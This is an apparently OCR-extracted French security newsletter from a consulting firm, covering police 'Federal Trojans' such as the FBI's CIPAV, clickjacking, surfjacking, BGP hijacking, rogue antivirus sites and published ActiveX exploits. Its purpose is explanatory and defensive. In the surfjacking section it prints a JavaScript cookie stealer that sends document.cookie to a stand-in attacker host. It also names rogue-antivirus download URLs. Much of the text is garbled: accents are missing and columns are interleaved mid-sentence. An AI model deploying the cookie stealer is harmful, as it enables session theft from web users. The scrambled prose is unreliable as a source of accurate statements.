Académique Documents
Professionnel Documents
Culture Documents
SO MM AIR E
L es Fed e ra l Troja n : le s co ute s e t le s p e rq u is itio n s n u m r iq ue s
L es blogs s c ur it du m oi s : l a v is e t la v ie d e s e x p e r ts s c u r it
Vo u s t e s c o n c e r n p a r l a s c u r i t i n f o r m a t i q u e d e v o t r e e n t r e p r i s e ?
Xmco Partners est un cabinet de conseil dont le mtier est l'audit en scurit informatique.
Tests d'intrusion
Mise l'preuve de vos rseaux, systmes et applications web par nos experts en intrusion
OWASP, OSSTMM, CCWAPSS
Audit de scurit
Audit technique et organisationnel de la scurit de votre Systme d'Information
Best Practices ISO 27001, PCI DSS, Sarbanes-Oxley
Veille en vulnrabilits
Suivi personnalis des vulnrabilits et des correctifs affectant votre Systme d'Information
Rponse intrusion
Dtection et diagnostic d'intrusion, collecte des preuves, tude des logs, autopsie de malware
Fond en 2002 par des experts en scurit, dirig par ses fondateurs, nous n'intervenons que sous forme de projets
forfaitaires avec engagement de rsultats.
Les tests d'intrusion, les audits de scurit, la veille en vulnrabilit constituent les axes majeurs de dveloppement
de notre cabinet.
Paralllement, nous intervenons auprs de Directions Gnrales dans le cadre de missions daccompagnement de
RSSI, dlaboration de schma directeur ou encore de sminaires de sensibilisation auprs de plusieurs grands
comptes franais.
Notre secteur d'activit souffre d'activit, en passant par la scurit temps de crise (dont tout le monde
d'hyperactivit depuis son origine : du dveloppement. Finalement, il parle, et dont nous ne parlerons
tous ses acteurs passent d'un sujet devient de plus en plus courant de pas !), que va-t-il advenir des
un autre, avec une quasi- constater qu'en crant des postes budgets scurit ? Vont-ils tre
frnsie, sans jamais aller au bout de RSSI, chaque personne de maintenus ? Diminus ?
des choses, ni jamais rgler l'entreprise s'est dessaisie de la Augments ?
totalement les problmes, au motif scurit puisqu'un Sauveur venait Aprs l'affaire Kerviel et les
qu'il y a trop de sujets couvrir... point nomm l'en dbarrasser. multiples constats de dfaillances
informatiques, a serait un comble
En dfinitive, on peut se poser la de se retrouver en plus sans
question lgitime suivante : moyen...
adresser des problmatiques
complexes qui ncessitent des En attendant de dcouvrir peu
notions aussi bien d'expertises que peu les rponses aux questions qui
de diplomatie et de ngociation ne se profilent, voici de nouvelles
doit-il relever que du RSSI...? tudes concernant les attaques
Si l'on regarde bien chaque mtier Web du moment, un petit mot sur
de l'informatique, tout le monde notre participation au prochain
jouit d'un descriptif de poste prcis, Infosecurity, un descriptif des
avec des objectifs dtaills chevaux de Troie utiliss par les
atteindre, et des moyens plus ou Au final, au lieu de fdrer les gouvernements et lactualit du
moins en adquation. nergies, le RSSI se retrouve mois.
devoir tout couvrir en mme temps,
Qu'en est-il du RSSI, auquel on parfois la place des autres. En esprant avoir vos avis trs
demande de couvrir aussi bien la Forcment, a puise... bientt, je vous souhaite une bonne
scurit des postes nomades, que juste titre, il est lgitime de poser lecture.
la gestion du Plan de reprise une question d'actualit : en ces Marc Behar
Le ClickJacking..........................................14 InfoSecurity.................................................32
Analyse dune nouvelle attaque Web, simple mais efficace. Le Salon InfoSecurity et la confrence XMCO
Le SurfJacking............................................19
Les Blogs scurit.......................... ...........33
Prsentation dune autre attaque web exploitant les cookies
Robert Hansen, Cdric Blancher et Bily Rios
non scuriss.
La collecte de renseignements
Les preuves sont inutiles si la police ne peut pas Un Federal Trojan doit tre capable de
localiser prcisment le suspect ("loger" dans le jargon golocaliser lordinateur infect par plusieurs
policier). Comment un Trojan pourrait-il golocaliser mthodes : adresse IP source, triangulation,
l'ordinateur ?
recherche dans lhistorique de navigation...
Tout d'abord, le Trojan pourra dterminer l'adresse IP
LAN et publique du suspect. Cela peut tre trs utile si
le suspect utilise un rebond ou le rseau Ce Trojan installait alors une Backdoor IRC sur tous les
d'anonymisation TOR. partir de l'adresse IP relle du ordinateurs lisant le CD. Mis part le fait de combattre
suspect et avec la collaboration du FAI de ce dernier, il le piratage, les objectifs rels de ce Trojan n'ont jamais
sera possible d'obtenir l'adresse postale de la t dtermins. Pour l'anecdote, quelques semaines
personne. Le FBI possde d'ailleurs un Trojan ddi aprs la dcouverte du Trojan Sony, un malware
la rvlation de l'IP relle d'un suspect (voir cas nomm Stinx, diffus sur la toile, tentait dj d'exploiter
l'encadr Timberlinebombinfo). une faille de scurit du Trojan Sony.
Le meilleur Trojan de srie serait videmment un code Concrtement, si les gouvernements investissent dans
insr directement dans le micro-processeur par le le dveloppement d'un vritable Trojan des fins
fondeur (AMD, Intel, Motorola...). Ds lors, il serait policires, il est probable que ce logiciel fonctionnera
extrmement difficile de dtecter ces programmes- avant tout sur les systmes Windows. Avec
espions, car ces derniers ne seraient pas dans le l'engouement pour le systme Mac OS X, il est aussi
systme d'exploitation. probable qu'il devra galement s'infiltrer dans la
pomme.
Plusieurs sujets connexes ont t prsents la Dans le cas o la cible utilise Windows avec les droits
confrence SSTIC en juin dernier. Il est vident que ce Administrateurs, l'injection d'un Trojan ne sera pas
risque doit tre pris au srieux par les agences de difficile. Mais si la cible est un systme Mac OS X ou
contre-espionnage. Linux, l'utilisateur devra autoriser le Trojan s'installer.
Les smartphones
WWW.XMCOPARTNERS.COM
LAFFAIRE TIMBERLINEBOMBINFO
Le 4 juin 2007, le lyce Timberline (Idaho, USA)
reoit plusieurs menaces terroristes par email. Cet
email, provenant de la webmail Google avec l'adresse
dougbrigs@gmail.com, menace de faire exploser une
bombe dans le lyce. L'auteur, sr de son anonymat,
ajoute mme Oh, and for the police officers and
technology idiots at the district office trying to
track this e.mail... I can give you a hint. The email
was sent over a newly made gmail account, from
overseas in a foreign country. ... So, good luck
talking with Italy about getting the identity of the
person who owns the 100Mbit dedicated server
Un lve dclare alors avoir reu des messages sur MySpace en provenance d'un profil
nomm Timberlinebominfo.
L'enqute redmarre alors. MySpace est somm de donner les logs de cration du profil
Timberlinebominfo. L encore, la dception est au rendez-vous : l'adresse IP est
l'adresse italienne.
L'auteur des menaces terroristes semble effectivement avoir pris ses prcautions.
Le FBI dcide alors d'utiliser un Federal Trojan nomm "CIPAV" (Computer and Internet
Protocol Address Verifier). L'objectif de ce Trojan est de rvler l'adresse IP relle
de la personne l'excutant, peu importe le nombre de rebond et de proxies utiliss.
CIPAV est alors implant sur le MySpace du pirate avec la collaboration de MySpace.
C'est ainsi que l'auteur des emails terroristes s'est fait piger : en visitant son
profil, le CIPAV s'est silencieusement install sur l'ordinateur du terroriste et a
immdiatement envoy l'adresse IP au FBI. A priori, le CIPAV aurait t inject via une
faille de scurit, alors non patche, d'Internet Explorer : la faille ANI.
Ensuite, ces Trojans ont pour objectif de faire ce que Un risque important pour le Trojan fdral rside dans
les Anglo-saxons appellent du "remote forensics" : de la le piratage du Trojan lui-mme. Il n'est pas rare de voir
rcupration de preuves distance. Une limite pourrait un malware s'attaquer un autre malware, comme le
trs bien tre la diffusion de fausses preuves ou la cas du Trojan Sony DRM.
dsinformation cible. Si le suspect est conscient d'tre
vrol, celui-ci peut volontairement laisser en vidence Que se passe-t-il si des pirates dcouvrent une
de fausses informations sur son bureau ou indiquer de vulnrabilit au sein mme du Trojan ? Ces derniers
fausses pistes par chat. pourraient prendre le contrle de l'ordinateur des
citoyens suspects. Pire, ils pourraient utiliser la mme
signature que celle du Trojan fdral - soit une
signature potentiellement non dtecte par les antivirus
- pour diffuser leur propre malware.
Il est trs probable que si un cadre juridique se forme La cration du service franais DCRI (Direction
autour du sujet des Trojans fdraux en France, il s'agit Centrale du Renseignement intrieur, le FBI
de la LOPSI. franais) et les diffrents projets de fusion des
fichiers de renseignements indiquent la tendance.
La LOPSI ou Loi d'Orientation et de Programmation
pour la Scurit intrieure, est apparue en 2002 sous la Il reste cependant de trs importantes contraintes
forme d'un projet de loi permettant aux officiers de techniques et lgales : comment cibler le suspect ?
police judiciaire, si un magistrat l'autorise, d'accder viter les drives ? Ne pas tre dtect par les
directement des fichiers informatiques et de saisir antivirus ? Construire des quipes d'experts
distance par la voie tlmatique ou informatique les (publics ou privs) qui maintiendront jour un outil
renseignements qui paratraient ncessaires la efficace ?
manifestation de la vrit (Source legifrance.gouv.fr).
Enfin, il est certain que les hackers - whitehat ou
Ce projet de loi est apparu aprs voir fait le constat blackhat - s'intresseront de trs prs ces outils
qu'un trop grand nombre d'enqutes judiciaires et chercheront les analyser en dtail.
pouvaient tre paralyses par l'incapacit des
institutions publiques ou prives (tablissements Beaucoup de points restent donc encore en
financiers, oprateurs de tlphonie, administrations...) suspens.
rpondre dans des dlais raisonnables aux
rquisitions effectues par les officiers de police
judiciaire la demande de l'autorit judiciaire. Le plus
souvent, la raison invoque par les personnes requises
pour justifier ce retard est la difficult d'extraire, de
traiter et de faire parvenir les renseignements
demands au service de police ou de gendarmerie
requrant.
XMCO | Partners
Le ClickJacking, une attaque connue, mais jamais En quelques mots, cette attaque permet, lors de la
aboutie visualisation dune page web, de duper lutilisateur
Retour sur le non-disclosure quant au contenu sur lequel il va interagir et donc
excuter des actions son insu.
Aprs le Surfjacking, un autre sujet d'actualit fait
parler de lui. Une fois de plus, les experts en scurit
Robert Hansen, plus connu sous son pseudonyme
RSnake (et fondateur du site ha.kers.org), et Jeremiah
Grossman (que l'on ne prsente plus), ont dcouvert
une faille de scurit critique affectant lensemble des
navigateurs internet.
La base de cette attaque rside dans le fait que les Il existe un grand nombre de variantes utilises pour
proprits HTML permettent de manipuler laffichage mettre en place une telle attaque. Certains utilisent du
dune page web. Il est possible de positionner des Flash, dautres des iframes ou encore du Javascript...
calques (lment HTML div) des endroits prdfinis Nous avons choisi de dvelopper une preuve de
dune page, et de jouer sur la profondeur lors de la concept fonctionnant sur Firefox (Mac OS X) afin de
superposition de plusieurs calques. vous prsenter de manire gnrale une des
techniques utilises.
En dautres mots, il est possible de crer un site web
contenant deux pages web superposes. Lutilisateur Le langage HTML possde de nombreuses fonctions et
effectue alors des actions sur une autre page que celle proprits. Les deux chercheurs ont utilis une de ces
visualise. options afin de dvelopper leurs preuves de concept.
Lattaque consiste alors placer un calque transparent En effet, il est possible dinclure au sein de balises DIV
en premire position, afin que lutilisateur ne visualise les proprits suivantes:
que le calque en arrire-plan. Le fait deffectuer cette La proprit z-index permet de spcifier la position
manipulation permet dinteragir avec le calque plac en d'empilement d'un bloc par rapport aux autres (notion
avant plan tandis que lutilisateur pense interagir avec de profondeur).
celui en arrire-plan. La proprit opacity permet de spcifier l'opacit
(transparence) d'un lment (ou filter pour Internet
Le schma ci-dessous explique le mcanisme. Explorer).
Ainsi, en utilisant conjointement ces options, nous
pouvons alors obtenir une page web contenant deux
calques HTML superposs.
INFO
Lutilisation malicieuse des animations
Flash...
WWW.XMCOPARTNERS.COM
INFO
Un test grandeur nature
De mme, la validation dActiveX peut galement tre La seconde, fonctionnelle sur tous les
envisage dans le cas o les traditionnelles bote de navigateurs, utilisent une iframe afin
dialogue ne sont pas utilises... de faire cliquer linternaute sur un
La redirection vers un site vrol, les fraudes aux autre lien.
clics... Bref un grande nombre de possibilits sont
maintenant offertes aux pirates... URL :
http://xmcopartners.com/actu-secu/21/
poc/clickjacking-iframe.html
Conclusion
XMCO | Partners
INFO
Forcer lutilisation de cookie Secure : une
fonctionnalit offerte par certains sites...
WWW.XMCOPARTNERS.COM
<script>
CookiesStealer = new Image();
CookiesStealer.src = http://www.site-pirate.com/
stealer.php?cookie=+document.cookie;
</script>
Webographie
INFO
Lextension NoScript
http://noscript.net/
WWW.XMCOPARTNERS.COM
XMCO | Partners
Aprs un t charg, notamment avec la faille de M.Kaminsky, les rcentes confrences BlackHat, Defcon et
OWASP 2008 ont permis de dcouvrir de nouvelles techniques dattaques web et rseau.
Ce mois-ci, nous aborderons la prsentation de Alex Pilosov et Anto Kapela sur le protocole BGP, le
Clipboard Hijacking dAviv Raf ainsi que le dni de service possible des stacks TCP/IP dcouvert par Jack
Louis.
Nous prsenterons galement les exploitations des vulnrabilits Microsoft MS08-041 et MS08-053 publies
sur Internet ainsi quun fait dactualit du moment les Rogues Antivirus.
WWW.XMCOPARTNERS.COM
BGP : un protocole de routage faillible Concrtement, lorsqu'un paquet doit tre achemin, le
routeur BGP de l'oprateur consulte sa table de routage
Aprs un mois de juillet particulirement riche en BGP afin de dcouvrir quel prfixe correspond
enseignements (faille DNS de Dan Kaminsky) sur l'adresse IP destination du paquet qu'il doit transmettre.
l'utilisation frauduleuse de certains protocoles Si deux AS sont mme de dlivrer le paquet, celui qui
considrs comme srs, une autre confrence possde le prfixe le plus prcis "gagne".
prsente la DefCon 16 a attir l'attention des
spcialistes en scurit. Le routage est donc bas sur la confiance alloue
chacun des noeuds du circuit.
En effet, Alex Pilosov et Anto Kapela de la socit
Hijacking BOF, ont galement montr avec quelle Lors de cette prsentation la Defcon insre dans le
facilit il tait possible d'exploiter simplement les planning au dernier moment, les deux experts Anto
faiblesses du protocole de routage Internet BGP Kapela et Alex Pilosov ont dmontr qu'il tait possible
(Border Gateway Protocol). de mener des attaques de type "Man in The Middle"
sur Internet et donc d'intercepter des donnes
Le protocole BGP est utilis pour vhiculer des destines un AS donn.
informations sur des rseaux (adresse IP + masque)
entre "autonomous systems" (AS). Une AS tant un
ensemble de rseaux IP contrl par une mme entit:
oprateurs, grande entreprise...
L'attaque est astucieuse, mais relativement bruyante : Les deux comparses ont malgr tout utilis des bases
un traceroute vers les IP hijackes permettra de connues afin de mettre en avant leur technique
connaitre le routeur pirate... d'attaque.
Les
Rfrences :
deux chercheurs ont men une
http://blog.wired.com/27bstroke6/2008/08/how-
attaque en live dont raffole l'auditoire de to-intercep.html
ce genre de confrence, savoir rerouter
un trafic via l'envoi de faux paquets BGP...
Des mcanismes existent afin de se prmunir contre ce
type de malversation (voir MyASN ou bien Renesys INFO...
Route Intelligence). Toutefois, les deux auteurs ont, Les piles TCP/IP en danger??
non seulement, russi intercepter un trafic, mais
galement le rerouter afin de berner ces mcanismes
de protection. Une nouvelle surprenante vient d'tre
relaye sur tous les blogs de scurit.
Selon les premires rumeurs, des
chercheurs (Jack Louis et Robert E. Lee
notamment connus pour le dveloppement du
scanner UnicornScan) auraient dcouvert en
2005 une faille au sein du protocole TCP.
Cette faille permettrait de mener des
attaques de dnis de service sur tous les
quipements implmentant une pile TCP/IP.
Ces derniers ont mme dvelopp un outil
permettant d'exploiter cette vulnrabilit
(non disponible actuellement).
http://debeveiligingsupdate.nl/audio/
bevupd_0003.mp3
URL : hxxp://total-secure2009.com/
Fichier : TotalSecure2009.exe
Rfrences :
[1] http://malwaredatabase.net/blog
[2] http://ddanchev.blogspot.com/
TotalSecure
URL : hxxp://spamnuker.com/
Fichier : OutlookSpamNukerInstaller.exe
INFO...
Un virus intgr dans les ordinateurs Eee PC
Box d'Asus
Antivirus2009
Cependant, dautres sites sont rapidement dtects et
bloqus par Firefox.
Clipboard Hijacking
Le contrle du presse-papier dans votre presse papier et de tomber sur un site web
malicieux exploitant une faille de votre navigateur...
Continuons dans les nouvelles attaques... Ok, scnario digne d'un film de science-fiction
Encore des exploits... Le code malicieux prend la forme d'une page Web qui
appelle malicieusement le contrle ActiveX wmex.dll
Passons maintenant aux exploits Microsoft. Deux afin dy exploiter un dbordement de tampon.
programmes malicieux ont t publis sur des sites
spcialiss. Ces dernires exploitent les vulnrabilits Cet exploit permet alors de lancer la calculatrice
MS08-041 (ActiveX Snapview) et MS08-053 (Media Windows sur un systme Windows XP SP2
Encoder) corriges en aot et septembre 2008. professionnel anglais. Nous attirons votre attention sur
le fait qu'une lgre modification de ce code permet de
Le premier programme exploite la rcente vulnrabilit prendre le contrle total du systme vulnrable
dcouverte au sein de l'ActiveX Snapview. (changement du shell code).
WWW.XMCOPARTNERS.COM
XMCO | Partners
Comme chaque anne, le Salon InfoSecurity revient les pourquoi Frdric Charpentier exposera diffrents
19 et 20 novembre 208 la Porte de Versailles. exemples dont on t victimes certains acteurs du
Les salons professionnels Infosecurity et Storage expo march.
2008 vous proposent de rencontrer tous les acteurs de Vous pouvez faire une demande de badge ladresse
la scurit informatique. suivante :
http://www.infosecurity.com.fr/FR/badge?ref=XMCW
Autour de 130 stands, vous retrouverez tous les
revendeurs, les experts et les consultants scurit...
XMCO | Partners
Les blogs des chercheurs ou des consultants scurit sont nombreux... Ce chapitre va donc vous prsenter nos Blogs
prfrs des acteurs de la scurit les plus renomms.
Nous continuerons, dans nos prochains numros, cette srie de blogs qui ravira la plupart de nos lecteurs...
Au programme de ce mois :
Description Bily Rios est ingnieur scurit pour la socit Microsoft. Prsent
chaque anne la Blackhat pour prsenter des sujets toujours plus
intressants les uns que les autres, Billy revient (quand son emploi
du temps le lui permet) sur les nouvelles tendances scurit du
moment.
Son exprience et ses analyses permettent de comprendre
facilement les nouveaux vecteurs dattaques...
Capture dcran
Adresse http://xs-sniper.com/blog
Avis XMCO
WWW.XMCOPARTNERS.COM
Le blog de Billy RIOS est intressant. Le sujets abords sont varis
et les contenus toujours passionnants.
Description Robert Hansen nest plus prsenter. Pour certains dentre vous le
pseudonyme Rsnake vous parle peut tre davantage.
Robert Hansen est le fondateur du clbre site ha.ckers.org.
Chaque semaine, rsnake nous fait part de son avis sur de nouvelles
attaques web.
Capture dcran
Adresse http://ha.ckers.org
Avis XMCO Ha.ckers.org est un trs bon blog tenu jour et qui aborde toujours
des sujets passionnants. De nombreux fans commentent et
participent aux rflexions sur les sujets proposs toujours avec les
commentaires du chercheur.
WWW.XMCOPARTNERS.COM
Capture dcran
Adresse http://sid.rstack.org/blog/
Avis XMCO Le blog de Cdric Blancher est un de nos favoris. Les sujets
abords sont divers et varis et le ton de ses interventions nous
sduit toujours.
propos de lActuScu
LActuScu est un magazine numrique rdig et dit par les consultants du cabinet de conseil Xmco Partners.
Sa vocation est de fournir des prsentations claires et dtailles sur le thme de la scurit informatique, en toute
indpendance. Il sagit de notre newsletter.
Fonds en 2002 par des experts en scurit, dirige par ses fondateurs, nous
n'intervenons que sous forme de projets forfaitaires avec engagement de rsultats.
Les tests d'intrusion, les audits de scurit, la veille en vulnrabilit constituent
les axes majeurs de dveloppement de notre cabinet.
Pour contacter le cabinet Xmco Partners et obtenir des informations sur notre mtier : 01 47 34 68 61.
Notre site web : http://www.xmcopartners.com/
WWW.XMCOPARTNERS.COM